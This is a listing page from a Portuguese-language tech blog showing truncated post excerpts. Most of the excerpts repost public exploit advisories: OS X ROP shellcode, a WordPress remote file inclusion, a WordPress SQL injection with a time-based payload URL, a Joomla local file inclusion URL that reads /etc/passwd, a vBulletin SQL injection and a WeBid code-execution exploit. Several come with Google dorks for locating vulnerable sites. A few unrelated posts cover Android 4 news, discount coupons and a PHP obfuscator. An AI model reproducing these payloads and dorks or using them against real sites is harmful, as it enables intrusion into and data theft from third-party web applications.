Código Fonte do Android 4 será liberado antes do fim do ano

24/10/2011 0 Comments

Bem, temos percebido que muitos leitores já estão buscando no Google o termo instalando android 4 no milestone 2 ou coisa do tipo (mudando somente o smartphone), só que, não é correto correr atrás dessas instalações agora, pois o Google Android 4 ainda nem foi liberado (source) aos desenvolvedores. Segundo noticiado (pelo Notícias Linux e …

OSX universal ROP shellcode Testado no SNOW LEOPARD

03/10/2011 0 Comments

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want …

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 0 Comments

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

WordPress Event Registration plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * …

Joomla Component mod_spo SQL Injection Vulnerability

25/07/2011 0 Comments

# Exploit Title: Simple Page Option LFI # Google Dork: inurl:mod_spo # Date: 15/07/2011 # Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca # Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip # Version: 1.5.x # Tested on: Backtrack and Windows 7 Simple Page Option – LFI Vulnerable-Code: $s_lang =& JRequest::getVar(‘spo_site_lang’); (file_exists(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’)) ? include(dirname(__FILE__).DS.’languages’.DS.$s_lang.’.php’) : include(dirname(__FILE__).DS.’languages’.DS.’english.php’); Vulnerable-Var: spo_site_lang= Expl0iting: http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using %20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se Reparing?: Just …

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

25/07/2011 0 Comments

# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day # Google Dork: intitle: powered by Vbulletin 4 # Date: 20/07/2011 # Author: FB1H2S # Software Link: [[url]http://www.vbulletin.com/][/url] # Version: [4.x.x] # Tested on: [relevant os] # CVE : [[url]http://members.vbulletin.com/][/url] ###################################################################################################### Vulnerability: ###################################################################################################### Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability …

WeBid

04/07/2011 0 Comments

/* ———————————————————— WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit ———————————————————— author…: EgiX mail…..: n0b0d13s[at]gmail[dot]com link…..: http://www.webidsupport.com/ This PoC was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. [-] Vulnerable code to SQL injection in feedback.php: 154. $query = “SELECT title FROM ” . $DBPrefix …

PROMOCODE DE DESCONTO DE NOVEMBRO E DEZEMBRO PARA LOJAS VIRTUAIS

17/11/2009 0 Comments

Galera, para conferir basta clicar aqui O link acima mostra cupons de desconto para lojas virtuais como: Submarino, Saraiva, Americanas e etc. Boas compras!

PHP: Não tem dinheiro para “encriptar” seus scripts? Obfuscator já!

15/09/2009 0 Comments

Pois é, esta dica vai para quem está precisando poupar um cash mas gostaria de tornar mais difícil a leitura de seus scripts pelos “rippators tabajara” da web! Isto mesmo, com o PHP Obfuscator Seus problemas acabaram! Grátis e Open Source! Segue o link do site: http://www.raizlabs.com/software/phpobfuscator/